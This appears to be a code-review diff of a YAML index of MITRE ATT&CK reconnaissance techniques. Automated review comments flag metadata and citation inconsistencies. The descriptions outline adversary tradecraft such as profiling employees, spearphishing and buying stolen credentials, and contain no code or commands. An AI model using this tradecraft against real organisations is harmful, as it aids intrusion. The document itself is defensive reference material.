+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
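Review bot: The `SecurityTrails Google Hacking` reference keeps its source_name and the Borges / "Exploring Google Hacking Techniques" description, but its URL now points at a recordedfuture.com page, so the citation text and its target no longer agree; the same substitution is made on T1593 further down in this diff. Nothing is functionally broken, because `(Citation: SecurityTrails Google Hacking)` in the description still resolves to this entry, and the mismatch originates in upstream ATT&CK data rather than in this generator, so it should be raised upstream rather than patched here.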
@@ -56042,7 +56731,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -56058,8 +56747,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -56120,29 +56807,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -56151,15 +56819,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -56185,7 +56872,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -56203,47 +56890,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -56252,19 +56902,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
@@ -56287,7 +56973,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -56303,8 +56989,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
@@ -56330,7 +57014,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -56346,8 +57030,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -56375,7 +57057,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -56391,12 +57073,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -56405,16 +57085,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -56427,8 +57107,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -56439,52 +57119,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
@@ -56506,7 +57184,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
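Review bot: the `modified` timestamp for T1592.003 moves backwards here, from '2022-04-25T14:00:00.188Z' to '2021-04-15T03:22:46.759Z', and the same backward move appears in most of the sub-technique hunks below. That is plausible if the regenerated index now copies each object's own STIX `modified` value instead of a bundle-wide date, but please confirm the generator is reading the intended ATT&CK release, since a stale source bundle would produce exactly this pattern.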
@@ -56522,8 +57200,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
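Review bot: this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1592.003 without adding a replacement, so the object ends up with no attack spec version key at all, whereas T1597 in the hunk above gains `x_mitre_attack_spec_version: 3.2.0`. The same drop recurs for T1592.002, T1593.001, T1591.004, T1596.005, T1591.001, T1598.001 and T1491.002. If any consumer of the index reads that key, it should tolerate its absence, or the generator should emit it consistently for every technique.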
@@ -56549,7 +57225,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -56567,8 +57243,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -56590,7 +57264,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -56606,12 +57280,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -56621,17 +57293,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
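Review bot: the reordered description now cites three new sources (Bleeping Computer 2easy 2021, SecureWorks Infostealers 2023, Bleeping Computer Stealer Logs 2023); each has a matching `external_references` entry added in the hunks that follow, and `x_mitre_version` is bumped from '1.1' to '1.2' further down, so the wording change and the metadata are consistent. One readability point: re-wrapping the folded double-quoted scalar makes the diff far larger than the actual text change; a word-level diff is the easier way to verify that only the paragraph order and the new market/infostealer sentence changed.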
@@ -56643,6 +57318,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -56653,7 +57329,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -56663,6 +57339,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
+ - source_name: Bleeping Computer 2easy 2021
+ description: Bill Toulas. (2021, December 21). 2easy now a significant dark
+ web marketplace for stolen data. Retrieved October 7, 2024.
+ url: https://www.bleepingcomputer.com/news/security/2easy-now-a-significant-dark-web-marketplace-for-stolen-data/
- source_name: ATT ScanBox
description: 'Blasco, J. (2014, August 28). Scanbox: A Reconnaissance Framework
Used with Watering Hole Attacks. Retrieved October 19, 2020.'
@@ -56675,6 +57355,10 @@ reconnaissance:
description: Dylan Ayrey. (2016, December 31). truffleHog. Retrieved October
19, 2020.
url: https://github.com/dxa4481/truffleHog
+ - source_name: Bleeping Computer Stealer Logs 2023
+ description: 'Flare. (2023, June 6). Dissecting the Dark Web Supply Chain:
+ Stealer Logs in Context. Retrieved October 10, 2024.'
+ url: https://www.bleepingcomputer.com/news/security/dissecting-the-dark-web-supply-chain-stealer-logs-in-context/
- source_name: Register Uber
description: McCarthy, K. (2015, February 28). FORK ME! Uber hauls GitHub
into court to find who hacked database of 50,000 drivers. Retrieved October
@@ -56697,6 +57381,10 @@ reconnaissance:
Service Credentials, Hijack Account To Mine Virtual Currency. Retrieved
October 19, 2020.
url: https://www.forbes.com/sites/runasandvik/2014/01/14/attackers-scrape-github-for-cloud-service-credentials-hijack-account-to-mine-virtual-currency/#242c479d3196
+ - source_name: SecureWorks Infostealers 2023
+ description: SecureWorks Counter Threat Unit Research Team. (2023, May 16).
+ The Growing Threat from Infostealers. Retrieved October 10, 2024.
+ url: https://www.secureworks.com/research/the-growing-threat-from-infostealers
- source_name: Register Deloitte
description: 'Thomson, I. (2017, September 26). Deloitte is a sitting duck:
Key systems with RDP open, VPN and proxy ''login details leaked''. Retrieved
@@ -56704,9 +57392,8 @@ reconnaissance:
url: https://www.theregister.com/2017/09/26/deloitte_leak_github_and_google/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595.003:
technique:
@@ -56765,7 +57452,7 @@ reconnaissance:
adversaries may leverage [Data from Cloud Storage](https://attack.mitre.org/techniques/T1530)
to access valuable information that can be exfiltrated or used to escalate
privileges and move laterally. "
- modified: '2022-05-24T14:00:00.188Z'
+ modified: '2022-04-15T19:10:23.838Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Wordlist Scanning
x_mitre_detection: "Monitor for suspicious network traffic that could be indicative
@@ -56785,7 +57472,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Content'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1591.004:
technique:
@@ -56807,7 +57493,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:39:08.904Z'
name: Identify Roles
description: |-
Adversaries may gather information about identities and roles within the victim organization that can be used during targeting. Information about business roles may reveal a variety of targetable details, including identifiable information for key personnel as well as what data/resources they have access to.
@@ -56823,12 +57509,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598:
technique:
- modified: '2023-09-08T20:28:49.600Z'
+ modified: '2024-05-31T04:18:44.570Z'
name: Phishing for Information
description: "Adversaries may send phishing messages to elicit sensitive information
that can be used during targeting. Phishing for information is an attempt
@@ -56897,7 +57581,7 @@ reconnaissance:
- source_name: ACSC Email Spoofing
description: Australian Cyber Security Centre. (2012, December). Mitigating
Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- source_name: Avertium callback phishing
description: Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK
